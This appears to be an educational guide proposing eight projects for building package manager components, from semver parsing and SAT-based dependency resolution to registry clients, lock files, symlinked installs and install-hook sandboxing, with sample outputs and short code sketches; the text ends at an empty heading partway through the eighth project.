PACKAGE MANAGER INTERNALS PROJECTS
Package Manager Internals: From Magic to Mastery
Goal: Understand how package managers (npm, Cargo, Homebrew, pip) work by building progressively complex components that exercise each fundamental concept.
Core Concepts You’ll Master
Package managers solve several interconnected problems:
- Version Parsing & Comparison - Understanding semver, comparing 1.2.3 vs 1.2.4-beta.1
- Constraint Satisfaction - Finding versions that satisfy ^1.2.0 AND >=1.1.5 <2.0.0
- Dependency Resolution - The NP-complete problem of finding compatible versions for an entire graph
- Registry Protocols - HTTP APIs, package metadata (“packuments”), tarballs
- Lock Files - Reproducible builds, integrity hashes
- Installation & Linking - Cellar/node_modules structures, symlinks, PATH management
- Caching - Avoiding re-downloads, content-addressable storage
- Security - Checksums, signatures, supply chain integrity
Project 1: Semver Parser & Comparator
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: C, Go, TypeScript
- Coolness Level: Level 2: Practical but Forgettable
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 2: Intermediate
- Knowledge Area: Parsing / String Processing
- Software or Tool: Semver Library
- Main Book: “Language Implementation Patterns” by Terence Parr
What you’ll build: A complete semver library that parses version strings (1.2.3-alpha.1+build.456), compares them, and evaluates range constraints (^1.2.0, >=1.0.0 <2.0.0, ~1.2.3).
Why it teaches package managers: Every package manager operation starts with parsing and comparing versions. When npm decides whether lodash@4.17.21 satisfies ^4.0.0, it’s using exactly this logic. You’ll understand why 1.0.0-alpha < 1.0.0 and how pre-release identifiers work.
Core challenges you’ll face:
- Tokenizing version strings (split on ., -, +) → maps to lexical analysis
- Handling pre-release precedence (1.0.0-alpha.1 vs 1.0.0-alpha.2 vs 1.0.0) → maps to comparison algorithms
- Parsing range expressions (>=1.2.0 <2.0.0 || 3.x) → maps to recursive descent parsing
- Operator semantics (difference between ^, ~, >=, *) → maps to domain modeling
Key Concepts:
- Lexical Analysis: “Language Implementation Patterns” Chapter 2 - Terence Parr
- Semantic Versioning Spec: semver.org specification - Official Spec
- Comparison Algorithms: “Algorithms, Fourth Edition” Chapter 2 (Sorting) - Sedgewick & Wayne
- Recursive Descent Parsing: “Writing a C Compiler” Chapter 1 - Nora Sandler
Difficulty: Intermediate Time estimate: Weekend Prerequisites: Basic parsing concepts, string manipulation
Real world outcome:
$ ./semver compare 1.2.3 1.2.4
1.2.3 < 1.2.4
$ ./semver satisfies 1.2.3 "^1.0.0"
✓ 1.2.3 satisfies ^1.0.0
$ ./semver satisfies 2.0.0 "^1.0.0"
✗ 2.0.0 does NOT satisfy ^1.0.0 (major version mismatch)
$ ./semver parse 1.2.3-alpha.1+build.456
Version {
major: 1,
minor: 2,
patch: 3,
prerelease: ["alpha", 1],
build: ["build", 456]
}
Implementation Hints:
- Start by parsing just X.Y.Z before handling pre-release/build metadata
- The range operators have specific meanings: ^ allows minor/patch changes, ~ allows only patch changes, * and x are wildcards
- Pre-release versions have lower precedence than the associated normal version (see the sketch below)
- Build metadata should be ignored when comparing versions (per spec section 10)
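A minimal comparison sketch in Python (the suggested main language is Rust, so treat this as annotated pseudocode), assuming inputs are already valid semver strings: build metadata is stripped, numeric pre-release identifiers compare numerically, and a pre-release ranks below its normal version.

```python
# Semver precedence sketch; assumes inputs are valid version strings.
def parse(v):
    v, _, _build = v.partition("+")            # build metadata is ignored (spec section 10)
    core, _, prerelease = v.partition("-")
    major, minor, patch = (int(x) for x in core.split("."))
    pre = prerelease.split(".") if prerelease else []
    return (major, minor, patch, pre)

def pre_key(identifier):
    # Numeric identifiers compare numerically and rank below alphanumeric ones.
    return (0, int(identifier), "") if identifier.isdigit() else (1, 0, identifier)

def compare(a, b):
    va, vb = parse(a), parse(b)
    if va[:3] != vb[:3]:
        return -1 if va[:3] < vb[:3] else 1
    pa, pb = va[3], vb[3]
    if pa and not pb:
        return -1                              # 1.0.0-alpha < 1.0.0
    if pb and not pa:
        return 1
    ka, kb = [pre_key(x) for x in pa], [pre_key(x) for x in pb]
    return (ka > kb) - (ka < kb)

assert compare("1.0.0-alpha", "1.0.0") == -1
assert compare("1.0.0-alpha.1", "1.0.0-alpha.2") == -1
assert compare("1.2.3+build.456", "1.2.3") == 0
```

Range evaluation (^, ~, >=) then layers on top of this comparator by lowering each operator to a pair of version bounds.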
Learning milestones:
- Parse and compare basic versions → You understand tokenization
- Handle pre-release ordering correctly → You understand semver semantics
- Evaluate complex range expressions → You can build expression parsers
Project 2: Dependency Graph Builder & Cycle Detector
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Python
- Alternative Programming Languages: Rust, Go, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 2: Intermediate
- Knowledge Area: Graph Algorithms / Data Structures
- Software or Tool: Dependency Analyzer
- Main Book: “Algorithms, Fourth Edition” by Robert Sedgewick and Kevin Wayne
What you’ll build: A tool that reads package manifest files (package.json, Cargo.toml, or your own format), builds a directed dependency graph, detects cycles, and outputs a topological installation order.
Why it teaches package managers: Before resolving versions, package managers must understand the shape of dependencies. Circular dependencies are forbidden (or require special handling). Installation must happen in dependency order—you can’t build express before its dependencies exist.
Core challenges you’ll face:
- Parsing manifest files (JSON/TOML) → maps to file I/O and parsing
- Building adjacency lists (package → [dependencies]) → maps to graph representation
- DFS-based cycle detection (finding back edges) → maps to graph traversal
- Topological sorting (installation order) → maps to graph algorithms
- Transitive dependency expansion (A→B→C means A needs C) → maps to graph closure
Key Concepts:
- Graph Representations: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
- Depth-First Search: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
- Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
- Cycle Detection: “Grokking Algorithms” Chapter 6 - Aditya Bhargava
Difficulty: Intermediate Time estimate: Weekend Prerequisites: Basic graph theory, DFS/BFS understanding
Real world outcome:
$ ./depgraph analyze ./my-project
Dependency Graph:
my-app
├── express@^4.0.0
│ ├── body-parser@^1.0.0
│ │ └── bytes@^3.0.0
│ └── accepts@^1.0.0
└── lodash@^4.17.0
Total packages: 5
Max depth: 3
$ ./depgraph check-cycles ./circular-project
⚠️ Circular dependency detected!
package-a → package-b → package-c → package-a
$ ./depgraph install-order ./my-project
Installation order:
1. bytes@^3.0.0
2. body-parser@^1.0.0
3. accepts@^1.0.0
4. lodash@^4.17.0
5. express@^4.0.0
6. my-app
Implementation Hints:
- Use a dictionary/hashmap where keys are package names and values are lists of dependency names
- For cycle detection, maintain three states during DFS: unvisited, in-progress, completed
- A cycle exists if you visit a node that’s currently “in-progress” (a back edge)
- Topological sort is just the reverse of DFS post-order traversal
- Consider using Kahn’s algorithm (BFS-based) as an alternative approach
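A sketch of the three-state DFS from the hints above, assuming the graph is already a {package: [dependencies]} dict; because edges point from a package to its dependencies, plain post-order already lists dependencies before their dependents.

```python
# Three-state DFS: cycle detection plus installation order.
WHITE, GRAY, BLACK = 0, 1, 2        # unvisited, in-progress, completed

def install_order(graph):
    state = {node: WHITE for node in graph}
    order = []

    def dfs(node, path):
        state[node] = GRAY
        for dep in graph.get(node, []):
            if state.get(dep, WHITE) == GRAY:          # back edge -> cycle
                raise ValueError("circular dependency: " + " -> ".join(path + [dep]))
            if state.get(dep, WHITE) == WHITE:
                dfs(dep, path + [dep])
        state[node] = BLACK
        order.append(node)                             # post-order: deps land first

    for node in list(graph):
        if state[node] == WHITE:
            dfs(node, [node])
    return order

deps = {
    "my-app": ["express", "lodash"],
    "express": ["body-parser", "accepts"],
    "body-parser": ["bytes"],
    "accepts": [], "bytes": [], "lodash": [],
}
print(install_order(deps))
# ['bytes', 'body-parser', 'accepts', 'express', 'lodash', 'my-app']
```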
Learning milestones:
- Build and visualize dependency graphs → You understand graph representation
- Detect circular dependencies → You understand DFS traversal states
- Generate correct installation order → You understand topological sorting
Project 3: Version Constraint SAT Solver
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Python
- Alternative Programming Languages: Rust, Haskell, OCaml
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 4: Expert
- Knowledge Area: Constraint Satisfaction / Logic
- Software or Tool: Dependency Resolver
- Main Book: “The Art of Computer Programming, Volume 4, Fascicle 6: Satisfiability” by Donald E. Knuth
What you’ll build: A dependency resolver that translates version constraints into boolean satisfiability (SAT) clauses and uses a solver (either your own DPLL implementation or an off-the-shelf solver like PicoSAT) to find compatible versions.
Why it teaches package managers: This is the heart of modern package managers. When you have A requires B>=1.0.0 and C requires B<1.5.0 and D requires B>=1.3.0, finding B@1.4.0 is a SAT problem. Understanding this reveals why “dependency hell” is NP-complete and why resolvers sometimes take a long time.
Core challenges you’ll face:
- Encoding constraints as CNF (Conjunctive Normal Form) → maps to propositional logic
- At-most-one constraints (only one version of each package) → maps to cardinality constraints
- Implementing DPLL algorithm (unit propagation, pure literal elimination) → maps to backtracking search
- Conflict analysis and learning (why did this fail?) → maps to debugging resolution failures
- Extracting solutions (boolean assignment → version selection) → maps to solution decoding
Resources for key challenges:
- Dependency Resolution Made Simple - Fernando Borretti’s practical guide to SAT-based resolution
- Version SAT - Russ Cox’s analysis of why version selection is NP-complete
- Software Design by Example: Package Manager - Step-by-step tutorial building a resolver
Key Concepts:
- SAT Problem Definition: “The Art of Computer Programming, Vol 4 Fascicle 6” - Donald Knuth
- DPLL Algorithm: Wikipedia: DPLL Algorithm - Classic backtracking SAT solver
- CNF Conversion: “Concrete Mathematics” Chapter 4 - Graham, Knuth, Patashnik
- Constraint Propagation: “Algorithms, Fourth Edition” Chapter 6 (Context) - Sedgewick & Wayne
Difficulty: Expert Time estimate: 2-4 weeks Prerequisites: Propositional logic, backtracking algorithms, semver (Project 1)
Real world outcome:
$ cat requirements.txt
web-framework >= 2.0.0
database-driver ^1.5.0
logger >= 1.0.0 < 3.0.0
# web-framework 2.0.0 requires logger ^2.0.0
# database-driver 1.5.0 requires logger >= 1.5.0
$ ./resolver solve requirements.txt
Resolving dependencies...
- web-framework: 6 versions available
- database-driver: 4 versions available
- logger: 12 versions available
Encoding as SAT problem...
- 22 variables (one per package-version pair)
- 156 clauses
Running DPLL solver...
- Propagations: 47
- Decisions: 3
- Conflicts: 1
- Learned clauses: 1
✓ Solution found:
web-framework@2.1.0
database-driver@1.5.2
logger@2.3.0
$ ./resolver solve impossible-requirements.txt
✗ No solution exists!
Conflict: web-framework@2.0.0 requires logger>=2.0.0
but old-lib@1.0.0 requires logger<2.0.0
Implementation Hints:
- Start with a brute-force solver (try all combinations) before optimizing with DPLL
- Each package-version pair becomes a boolean variable (e.g., lodash_4_17_0)
- "At most one version per package" becomes pairwise exclusion clauses: ¬lodash_4_17_0 ∨ ¬lodash_4_16_0
- Dependencies become implications: express_4_0_0 → (body_parser_1_0_0 ∨ body_parser_1_1_0 ∨ ...) (see the encoding sketch below)
- Consider using Python's python-sat library for a production solver, but implement basic DPLL yourself first
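A small sketch of that encoding over made-up packages: one boolean variable per package-version pair, pairwise at-most-one clauses, dependency implications, and a naive backtracking check standing in for DPLL (no unit propagation or clause learning).

```python
# CNF encoding sketch with a naive backtracking solver (toy data, no DPLL heuristics).
from itertools import combinations

VERSIONS = {"app": ["1.0.0"], "lib": ["2.0.0", "1.0.0"], "log": ["2.0.0", "1.5.0"]}
var = {(p, v): i + 1 for i, (p, v) in enumerate((p, v) for p in VERSIONS for v in VERSIONS[p])}

clauses = [[var[("app", "1.0.0")]]]                       # the root must be installed
for p, vs in VERSIONS.items():                            # at most one version per package
    for a, b in combinations(vs, 2):
        clauses.append([-var[(p, a)], -var[(p, b)]])
DEPS = {("app", "1.0.0"): {"lib": ["2.0.0", "1.0.0"], "log": ["2.0.0"]},
        ("lib", "2.0.0"): {"log": ["2.0.0", "1.5.0"]}}
for (p, v), reqs in DEPS.items():                         # dependencies become implications
    for dep, ok in reqs.items():
        clauses.append([-var[(p, v)]] + [var[(dep, w)] for w in ok])

def solve(assignment, i=1):
    if i > len(var):
        ok = all(any(assignment[abs(l)] == (l > 0) for l in c) for c in clauses)
        return assignment if ok else None
    for value in (True, False):
        result = solve({**assignment, i: value}, i + 1)
        if result is not None:
            return result
    return None

model = solve({})
print([f"{p}@{v}" for (p, v), i in var.items() if model[i]])
# ['app@1.0.0', 'lib@2.0.0', 'log@2.0.0']
```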
Learning milestones:
- Encode simple constraints as SAT → You understand the reduction
- Implement basic DPLL with unit propagation → You understand SAT solving
- Handle conflicts and report useful errors → You understand why resolution fails
- Solve real-world dependency graphs quickly → You understand optimization
Project 4: Package Registry Client
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 2: Intermediate
- Knowledge Area: Networking / HTTP APIs
- Software or Tool: npm/crates.io Client
- Main Book: “TCP/IP Illustrated, Volume 1” by W. Richard Stevens
What you’ll build: A client that talks to the npm registry (or crates.io) to fetch package metadata, download tarballs, verify checksums, and cache results locally.
Why it teaches package managers: This is how npm install actually gets packages. You’ll learn the registry protocol, understand why there’s both a “full” and “abbreviated” metadata format, and see how checksums ensure integrity.
Core challenges you’ll face:
- HTTP client with proper headers (User-Agent, Accept) → maps to protocol compliance
- Parsing “packument” JSON (package metadata format) → maps to API schemas
- Downloading and extracting tarballs (.tgz files) → maps to file formats
- Verifying SHA-512 integrity hashes → maps to security
- Implementing a local cache (avoid re-downloads) → maps to caching strategies
Resources for key challenges:
- npm Registry API Documentation - Official npm API spec
- Exploring the npm Registry API - Practical walkthrough
Key Concepts:
- HTTP Protocol: “TCP/IP Illustrated, Volume 1” Chapter 14 - W. Richard Stevens
- REST API Design: “Design and Build Great Web APIs” Chapter 3 - Mike Amundsen
- Checksums & Integrity: “Serious Cryptography, 2nd Edition” Chapter 5 - Jean-Philippe Aumasson
- Caching Strategies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann
Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP basics, JSON parsing, file I/O
Real world outcome:
$ ./registry-client info lodash
Package: lodash
Latest: 4.17.21
Description: Lodash modular utilities
License: MIT
Repository: https://github.com/lodash/lodash
Versions: 114 published
$ ./registry-client download lodash 4.17.21
Fetching metadata from https://registry.npmjs.org/lodash
Found version 4.17.21
Tarball: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Size: 308,599 bytes
SHA-512: CAMj...
Downloading... [████████████████████] 100%
Verifying integrity...
Expected: sha512-CAMj...
Actual: sha512-CAMj...
✓ Integrity verified
Extracting to ./cache/lodash-4.17.21/
✓ 1,057 files extracted
$ ./registry-client search "http client"
Results for "http client":
1. axios (104M weekly downloads) - Promise based HTTP client
2. node-fetch (67M weekly downloads) - A light-weight module
3. got (23M weekly downloads) - Human-friendly HTTP request library
Implementation Hints:
- The npm registry base URL is https://registry.npmjs.org
- Fetch metadata with GET /package-name (full) or GET /package-name/version (specific version)
- The dist field in version metadata contains the tarball URL and integrity hash
- Use the Accept: application/vnd.npm.install-v1+json header for abbreviated metadata
- For crates.io, the protocol is different: it uses a git-based index at https://github.com/rust-lang/crates.io-index
- Implement ETag-based caching to avoid re-downloading unchanged metadata
Learning milestones:
- Fetch and parse package metadata → You understand the registry protocol
- Download and verify tarballs → You understand integrity checking
- Implement caching with ETags → You understand efficient API usage
Project 5: Lock File Generator
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, Python, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 3: Advanced
- Knowledge Area: Reproducible Builds / Hashing
- Software or Tool: Lock File System
- Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann
What you’ll build: A system that, after dependency resolution, generates a lock file recording exact versions, download URLs, and integrity hashes—then can reinstall from the lock file without re-resolving.
Why it teaches package managers: Lock files are why npm ci and cargo build are deterministic. Without them, builds are non-reproducible. You’ll understand the difference between “loose” requirements (package.json) and “locked” reality (package-lock.json).
Core challenges you’ll face:
- Capturing resolved state (exact versions, not ranges) → maps to state serialization
- Recording integrity hashes (SHA-512 for each package) → maps to content-addressable storage
- Detecting lock file staleness (manifest changed since lock) → maps to change detection
- Partial updates (add one package without re-resolving everything) → maps to incremental computation
- Cross-platform reproducibility (same lock file, same result everywhere) → maps to deterministic builds
Key Concepts:
- Content Addressing: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann
- Cryptographic Hashes: “Serious Cryptography, 2nd Edition” Chapter 5 - Aumasson
- Reproducible Builds: reproducible-builds.org - Community standard
- JSON/TOML Serialization: “Fluent Python” Chapter 4 (for concepts) - Luciano Ramalho
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Projects 1-4 (semver, graphs, resolver, registry client)
Real world outcome:
$ cat mypackage.toml
[dependencies]
web-framework = "^2.0.0"
database = "^1.5.0"
$ ./lockgen generate mypackage.toml
Resolving dependencies...
Fetching package metadata...
Generating lock file...
✓ Created mypackage.lock
$ cat mypackage.lock
# Auto-generated lock file. Do not edit.
# Generated: 2025-01-15T10:30:00Z
[[package]]
name = "web-framework"
version = "2.1.3"
source = "https://registry.example.com/web-framework-2.1.3.tgz"
integrity = "sha512-abc123..."
dependencies = ["logger@2.0.0"]
[[package]]
name = "logger"
version = "2.0.0"
source = "https://registry.example.com/logger-2.0.0.tgz"
integrity = "sha512-def456..."
dependencies = []
[[package]]
name = "database"
version = "1.5.2"
source = "https://registry.example.com/database-1.5.2.tgz"
integrity = "sha512-ghi789..."
dependencies = []
$ ./lockgen install --from-lock mypackage.lock
Installing from lock file (no resolution needed)...
✓ logger@2.0.0 (cached)
✓ web-framework@2.1.3 (downloading...)
✓ database@1.5.2 (cached)
All packages installed. Integrity verified.
$ ./lockgen check mypackage.toml mypackage.lock
✓ Lock file is up-to-date with manifest
Implementation Hints:
- The lock file should contain: package name, exact version, download URL, integrity hash, and resolved dependencies
- Use SHA-512 (like npm) or SHA-256 (like Cargo) for integrity hashes
- Detect staleness by hashing the manifest file and storing that hash in the lock file
- For partial updates, only re-resolve the changed subtree of the dependency graph
- Consider supporting both JSON and TOML formats (npm uses JSON, Cargo uses TOML)
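A small sketch of the staleness check described above: hash the manifest, record that hash in the lock file, and compare on later runs. The file names, the JSON lock format, and the resolved-package shape here are illustrative only.

```python
# Lock file writing and staleness detection sketch.
import hashlib, json, pathlib

def manifest_digest(path):
    return hashlib.sha256(pathlib.Path(path).read_bytes()).hexdigest()

def write_lock(manifest_path, resolved, lock_path="mypackage.lock.json"):
    lock = {"manifest_sha256": manifest_digest(manifest_path), "packages": resolved}
    pathlib.Path(lock_path).write_text(json.dumps(lock, indent=2))

def lock_is_fresh(manifest_path, lock_path="mypackage.lock.json"):
    lock = json.loads(pathlib.Path(lock_path).read_text())
    return lock["manifest_sha256"] == manifest_digest(manifest_path)

pathlib.Path("mypackage.toml").write_text('[dependencies]\nweb-framework = "^2.0.0"\n')
write_lock("mypackage.toml", [{"name": "web-framework", "version": "2.1.3",
                               "source": "https://registry.example.com/web-framework-2.1.3.tgz",
                               "integrity": "sha512-abc123..."}])
print(lock_is_fresh("mypackage.toml"))   # True until mypackage.toml changes
```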
Learning milestones:
- Generate lock files after resolution → You understand state capture
- Install purely from lock file → You understand reproducibility
- Detect and handle manifest changes → You understand incremental updates
Project 6: Cellar-Style Package Installer
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: Rust, Go, Python
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 3: Advanced
- Knowledge Area: Filesystem / Symlinks
- Software or Tool: Package Installer (Homebrew-style)
- Main Book: “The Linux Programming Interface” by Michael Kerrisk
What you’ll build: An installer that extracts packages into versioned directories (like Homebrew’s Cellar: /usr/local/Cellar/pkg/1.2.3/) and creates symlinks to a common prefix (/usr/local/bin/), supporting multiple versions and atomic switching.
Why it teaches package managers: This is how Homebrew achieves clean installs, easy rollbacks, and multiple versions. You’ll understand why symlinks are powerful, how PATH works, and why “just copying files” isn’t enough.
Core challenges you’ll face:
- Versioned directory structure (Cellar layout) → maps to filesystem organization
- Creating relative symlinks (portable across machines) → maps to symlink mechanics
- Atomic version switching (switch from v1.0 to v2.0 safely) → maps to atomic operations
- Handling conflicts (two packages provide same binary) → maps to conflict resolution
- Uninstallation without orphans (clean removal) → maps to reference tracking
Key Concepts:
- Symlinks & Hard Links: “The Linux Programming Interface” Chapter 18 - Michael Kerrisk
- Atomic File Operations: “The Linux Programming Interface” Chapter 5 - Michael Kerrisk
- Filesystem Hierarchy: “How Linux Works, 3rd Edition” Chapter 4 - Brian Ward
- Homebrew Architecture: Formula Cookbook - Official docs
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Filesystem operations, symlink concepts, shell/PATH understanding
Real world outcome:
$ ./cellar install ./packages/vim-9.0.0.tgz
Installing vim@9.0.0...
Creating /usr/local/Cellar/vim/9.0.0/
Extracting 127 files...
Linking vim@9.0.0...
/usr/local/bin/vim → ../Cellar/vim/9.0.0/bin/vim
/usr/local/bin/vimdiff → ../Cellar/vim/9.0.0/bin/vimdiff
/usr/local/share/man/man1/vim.1 → ../../Cellar/vim/9.0.0/share/man/man1/vim.1
✓ vim@9.0.0 installed and linked
$ ls -la /usr/local/bin/vim
lrwxr-xr-x 1 user staff ../Cellar/vim/9.0.0/bin/vim
$ ./cellar install ./packages/vim-9.1.0.tgz
Installing vim@9.1.0...
✓ Installed to /usr/local/Cellar/vim/9.1.0/
Switching vim 9.0.0 → 9.1.0...
Unlinking 9.0.0...
Linking 9.1.0...
✓ Switched
$ ./cellar list
vim 9.0.0 (unlinked)
vim 9.1.0 (linked) ✓
$ ./cellar switch vim 9.0.0
Switching vim 9.1.0 → 9.0.0...
✓ Now using vim@9.0.0
$ ./cellar uninstall vim 9.0.0
Uninstalling vim@9.0.0...
Removing /usr/local/Cellar/vim/9.0.0/ (127 files)
✓ Removed
Implementation Hints:
- Cellar structure: $PREFIX/Cellar/$NAME/$VERSION/{bin,lib,share,...}
- Always use relative symlinks (../Cellar/...) not absolute (/usr/local/Cellar/...) for portability
- Use the symlink() system call (or language equivalent) to create links
- For atomic switching, create new links with temporary names, then rename() over old links (see the sketch below)
- Track installed files in a manifest (e.g., /Cellar/vim/9.0.0/.MANIFEST) for clean uninstall
- Handle the case where /usr/local/bin/ doesn't exist yet
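A Python sketch of that atomic switch (the project's main language is C, where the same calls are symlink(2) and rename(2)): build the new relative link under a temporary name, then rename it over the old one so readers never observe a missing binary. The prefix path in the commented call is only an example.

```python
# Atomic symlink switching sketch; rename over an existing link is atomic on POSIX.
import os

def atomic_symlink(target, link_path):
    tmp = link_path + ".tmp-switch"
    if os.path.lexists(tmp):
        os.unlink(tmp)
    os.symlink(target, tmp)              # relative target, e.g. ../Cellar/vim/9.1.0/bin/vim
    os.replace(tmp, link_path)           # rename(2): the old link is swapped in one step

def switch(prefix, name, version, binary):
    target = os.path.join("..", "Cellar", name, version, "bin", binary)
    atomic_symlink(target, os.path.join(prefix, "bin", binary))

# switch("/usr/local", "vim", "9.1.0", "vim")   # needs write access to the prefix
```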
Learning milestones:
- Install to versioned directories → You understand Cellar structure
- Create and manage symlinks → You understand the linking layer
- Atomically switch versions → You understand transactional installs
- Clean uninstall with no orphans → You understand reference tracking
Project 7: node_modules Hoisting Simulator
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: TypeScript
- Alternative Programming Languages: Python, Go, Rust
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 3: Advanced
- Knowledge Area: Tree Algorithms / Package Layout
- Software or Tool: npm/pnpm Simulator
- Main Book: “Data Structures the Fun Way” by Jeremy Kubica
What you’ll build: A tool that takes a resolved dependency graph and produces an optimized node_modules layout, demonstrating npm’s hoisting algorithm and pnpm’s content-addressable approach.
Why it teaches package managers: npm’s node_modules structure is famously complex. Why is it often 500MB? Why do you sometimes get duplicate packages? Why does pnpm use symlinks differently? This project reveals the tradeoffs.
Core challenges you’ll face:
- Hoisting algorithm (move deps up when possible) → maps to tree optimization
- Handling duplicate versions (when hoisting fails) → maps to space vs correctness tradeoff
- Phantom dependencies (accessing unhoisted packages) → maps to encapsulation violations
- pnpm’s content-addressable store (hardlinks to global cache) → maps to deduplication
- Flat vs nested layouts (yarn vs npm v2 vs npm v7) → maps to algorithm comparison
Key Concepts:
- Tree Traversal: “Data Structures the Fun Way” Chapter 6 - Jeremy Kubica
- npm Hoisting: npm docs: how npm3 works - Official npm docs
- pnpm’s Approach: pnpm.io/motivation - Why pnpm exists
- Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Tree data structures, npm/node basics
Real world outcome:
$ cat resolved-deps.json
{
"my-app": {
"deps": {
"express": "4.18.0",
"lodash": "4.17.21"
}
},
"express": {
"deps": {
"body-parser": "1.20.0",
"lodash": "4.17.21"
}
},
"body-parser": {
"deps": {
"lodash": "4.17.15"
}
}
}
$ ./hoister simulate --algorithm=npm resolved-deps.json
npm-style Layout (hoisted):
node_modules/
├── express/
├── lodash/ (4.17.21, hoisted)
├── body-parser/
│ └── node_modules/
│ └── lodash/ (4.17.15, nested - conflicts with hoisted)
└── .package-lock.json
Analysis:
Total packages: 4
Hoisted: 3
Nested duplicates: 1 (lodash has conflicting versions)
Disk usage: ~2.1 MB
$ ./hoister simulate --algorithm=pnpm resolved-deps.json
pnpm-style Layout (symlinks + store):
node_modules/
├── .pnpm/
│ ├── express@4.18.0/
│ │ └── node_modules/
│ │ ├── express/ → <hardlink to store>
│ │ ├── body-parser/ → ../../body-parser@1.20.0/...
│ │ └── lodash/ → ../../lodash@4.17.21/...
│ ├── body-parser@1.20.0/
│ │ └── node_modules/
│ │ ├── body-parser/ → <hardlink to store>
│ │ └── lodash/ → ../../lodash@4.17.15/...
│ ├── lodash@4.17.21/
│ └── lodash@4.17.15/
├── express/ → .pnpm/express@4.18.0/node_modules/express
└── lodash/ → .pnpm/lodash@4.17.21/node_modules/lodash
Analysis:
Total packages: 4
Store entries: 4 (deduplicated globally)
Disk usage: ~1.8 MB (shared across projects)
No phantom dependency access possible ✓
Implementation Hints:
- npm hoisting: for each package, try to place it at the highest possible level where no version conflict exists
- A conflict occurs when two versions of the same package would occupy the same path
- pnpm creates a flat store (.pnpm/name@version/) and symlinks from nested node_modules
- The key insight: pnpm's layout enforces that packages can only access their declared dependencies
- Consider also implementing Yarn's Plug'n'Play (PnP) layout, which avoids node_modules entirely
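A simplified hoisting sketch matching the resolved-deps.json example above (the project's main language is TypeScript; the logic translates directly): hoist a dependency to the top level unless a different version of the same name is already there, in which case it stays nested under its dependent.

```python
# Simplified npm-style hoisting over a name -> {dep: version} map.
resolved = {
    "my-app":      {"express": "4.18.0", "lodash": "4.17.21"},
    "express":     {"body-parser": "1.20.0", "lodash": "4.17.21"},
    "body-parser": {"lodash": "4.17.15"},
}

def hoist(resolved, root="my-app"):
    top, nested = {}, {}                       # top-level node_modules, per-package nested dirs
    queue = [(root, dep, ver) for dep, ver in resolved[root].items()]
    while queue:
        parent, name, version = queue.pop(0)
        if top.get(name, version) == version:  # no conflict: hoist (or already hoisted)
            top[name] = version
        else:                                  # conflicting version: nest under the parent
            nested.setdefault(parent, {})[name] = version
        queue += [(name, d, v) for d, v in resolved.get(name, {}).items()]
    return top, nested

top, nested = hoist(resolved)
print(top)      # {'express': '4.18.0', 'lodash': '4.17.21', 'body-parser': '1.20.0'}
print(nested)   # {'body-parser': {'lodash': '4.17.15'}}
```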
Learning milestones:
- Implement basic hoisting → You understand npm’s approach
- Handle version conflicts correctly → You understand why duplicates exist
- Implement pnpm’s symlink layout → You understand the alternative
- Compare disk usage and access patterns → You understand the tradeoffs
Project 8: Build Script Executor (Pre/Post Install Hooks)
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, Node.js
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 3: Advanced
- Knowledge Area: Process Management / Security
- Software or Tool: Install Hook Runner
- Main Book: “The Linux Programming Interface” by Michael Kerrisk
What you’ll build: A sandboxed executor for package install scripts (preinstall, postinstall, etc.) that runs build commands, handles native compilation, and implements security policies.
Why it teaches package managers: Many packages need to compile native extensions (like node-gyp for C++ addons) or run setup scripts. This is also a major security vector—malicious packages have used postinstall scripts for attacks. You’ll understand both the necessity and the danger.
Core challenges you’ll face:
- Running child processes (spawn, wait, capture output) → maps to process management
- Environment variable setup (PATH, npm_config_*, etc.) → maps to environment configuration
- Handling native builds (detecting compiler, platform-specific flags) → maps to build systems
- Sandboxing for security (limit filesystem/network access) → maps to security policies
- Timeout and resource limits (prevent runaway scripts) → maps to resource management
Key Concepts:
- Process Creation: “The Linux Programming Interface” Chapter 24-26 - Michael Kerrisk
- Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
- Sandboxing: “Linux Basics for Hackers” Chapter 14 - OccupyTheWeb
- Supply Chain Security: Socket.dev blog on npm security - Current research
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Process management, shell scripting, security basics
Real world outcome:
